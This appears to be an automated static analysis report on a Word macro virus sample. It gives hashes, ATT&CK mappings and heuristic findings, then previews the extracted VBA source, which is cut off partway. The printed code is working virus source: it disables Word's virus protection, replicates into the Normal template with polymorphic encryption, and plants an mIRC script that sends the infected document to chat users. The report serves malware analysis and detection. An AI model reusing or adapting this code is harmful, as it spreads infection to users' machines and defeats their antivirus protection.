Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a2fddb09876f8be1…

MALICIOUS

Office (OLE)

134.0 KB Created: 1999-07-06 22:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 61dfedbeeb6ad2f3970d0cc12efd0d1d SHA-1: 128c839cd10551c7d2e3ac784b219da83e374403 SHA-256: a2fddb09876f8be10c5fa1763acc3faf465c5e7127b64d986ee2b60e9afef670
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1037.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample contains VBA macros with AutoOpen and Document_Open subroutines, indicating it is designed to execute malicious code upon opening. The script attempts to save a file named 'Eugene.doc' and create an mIRC script to automatically send this file to chat room members upon joining. It also attempts to disable virus protection and save the document, suggesting an attempt to evade detection and spread.

Heuristics 6

  • ClamAV: Doc.Trojan.Bius-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bius-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 161087 bytes
SHA-256: f0982c63a1a615ce7b07675cf563652c7c5651ccec7a8d55ed2b23bf7034b4e9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
End
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Sub DOCUMENT_CLOSE()
On Error Resume Next
Arsonists:
Randomize Timer
Options.VirusProtection = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
GI = 8: GJ = 10: GR = 2: NX = 21: GL = 2: LO = 5
X9 = Chr(34): C = Chr(13): CC = Chr(34)
O2 = Normal.ThisDocument.Variables(1).Value
O3 = ActiveDocument.Variables(1).Value
If Len(O2) > 8000 Or O4 > 18 Then
O5 = 1
Do While Not Mid(O2, Len(O2) - O4, 1) = "'"
O4 = O4 + 1
O7 = Right(O2, O4)
Loop
End If
MsgBox "There are many ways to be a winner. This is one of them." & Chr(13) & "For any comments, suggestions or questions contact:" & Chr(13) & "" & Chr(13) & "eugene@avp.ru", 0, "Arsonists (c) 1998 Eugene Kaspersky"
ActiveDocument.SaveAs FileName:="C:\Eugene.doc", fileformat:=wdFormatDocument, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Kill "C:\mIRC\Script.ini"
Open "C:\mIRC\Script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick C:\Eugene.doc }"
Print #1, "n1=on 1:CONNECT: {"
Close 1
End Sub
L = Int(1 * 2)
If Len(O3) > 8000 Or O8 > 18 Then
O6 = 1
Do While Not Mid(O3, Len(O3) - O8, 1) = "'"
O8 = O8 + 1
O9 = Right(O3, O8)
Loop
End If
Set N1 = ActiveDocument.VBProject.VBCOMPONENTS(1).CODEMODULE
Set N2 = NormalTemplate.VBProject.VBCOMPONENTS(1).CODEMODULE
NI = N2.LINES(103, 1)
AI = N1.LINES(103, 1)
If Right(NI, 8) = "Vorg:" Then N3 = 1
If Right(AI, 8) = "Vorg:" Then N4 = 1
If N3 = 0 Then
Set N5 = N2
Set N6 = N1
Else
Set N5 = N1
Set N6 = N2
End If
If O5 = 1 Then V0 = O7: NE = O2: GoTo 9
For w = 1 To 100
N8 = N8 + C
Next w
With N6
For X = 1 To .COUNTOFLINES - 1
N7 = .LINES(X, 1)
If Left(N7, 1) = "'" Then GoTo 0
N8 = N8 & N7 & C
N9 = Int(5 * Rnd + 1)
If N9 = GR And X > 3 Then GoSub NA: U2 = "'" & NB & C: N8 = N8 & U2: U4 = U4 + Len(U2)
0 Next X
N8 = UCase(N8) & "END SUB" & C & "'"
RZ = Len(N8) - U4
End With
GoSub O1: V0 = NB
Do While Not Len(N8) = Len(NE)
q = q + 1
H = H + 1
NF = Mid(N8, q, 1)
H1 = Mid(V0, H, 1)
NG = Chr(Asc(NF) + Asc(H1))
If H = Len(V0) Then H = 0
NE = NE + NG
Loop
NE = NE + "'" + V0
9 LO = 5
GoSub NA: J1 = NB: GoSub NA: J2 = NB: GoSub NA: J3 = NB
GoSub NA: J4 = NB: GoSub NA: J5 = NB: GoSub NA: J6 = NB
GoSub NA: J9 = NB: GoSub NA: JA = NB: GoSub NA: JB = NB
GoSub NA: JC = NB: GoSub NA: JD = NB: GoSub NA: JE = NB
GoSub NA: JF = NB: GoSub NA: JG = NB: GoSub NA: JH = NB
GoSub NA: JI = NB: GoSub NA: JJ = NB: GoSub NA: JK = NB
GoSub NA: JL = NB: GoSub NA: VX = M: GoSub NA: JM = NB
GoSub NA: V1 = NB: GoSub NA: V2 = NB: GoSub NA: V3 = NB
GoSub NA: V4 = NB: GoSub NA: V5 = NB: GoSub NA: V6 = NB
GoSub NA: V7 = NB: GoSub NA: V8 = NB: GoSub NA: V9 = NB
GoSub NA: VA = NB: GoSub NA: VB = NB: GoSub NA: VC = NB
GoSub NA: NK = NB: GoSub NA: JZ = NB: GoSub NA: JV = NB
GoSub NA: TA = NB: GoSub NA: TB = NB: GoSub NA: TC = NB
GoSub NA: TD = NB: GoSub NA: TX = NB: GoSub NA: T4 = NB
GoSub NA: T5 = NB: GoSub NA: T6 = NB: GoSub NA: T7 = NB
GoSub NA: T8 = NB: WL = 10915: GoSub NA: T9 = NB
GoSub NA: JW = NB: NN = NC: GoSub NA: JX = NB: NN = 1
GoSub F1: R0 = F2: GoSub F1: RA = F2: GoSub F1: RB = F2
GoSub F1: RC = F2: GoSub F1: RD = F2: GoSub F1: RE = F2
GoSub F1: RF = F2: GoSub F1: RG = F2: GoSub F1: RH = F2
GoSub F1: RI = F2: NN = 0: GoSub F1: RJ = F2
For m1 = 1 To Len(VX): WW = WW + Asc(Mid(VX, m1, 1)): Next m1
GoTo NW
NA:
NB = Chr(Int(26 * Rnd + 65))
NL = Int((15 - LO) * Rnd + LO)
Do While Not Len(NB) = NL
6 NM = Int((122 - 48 + 1) * Rnd + 48)
If NM > 57 And NM < 65 Then GoTo 6
If NM > 90 And NM < 97 Then GoTo 6
NB = NB + Chr$(NM)
Loop
Return
O1:
NB = Chr(Int(26 * Rnd +
... (truncated)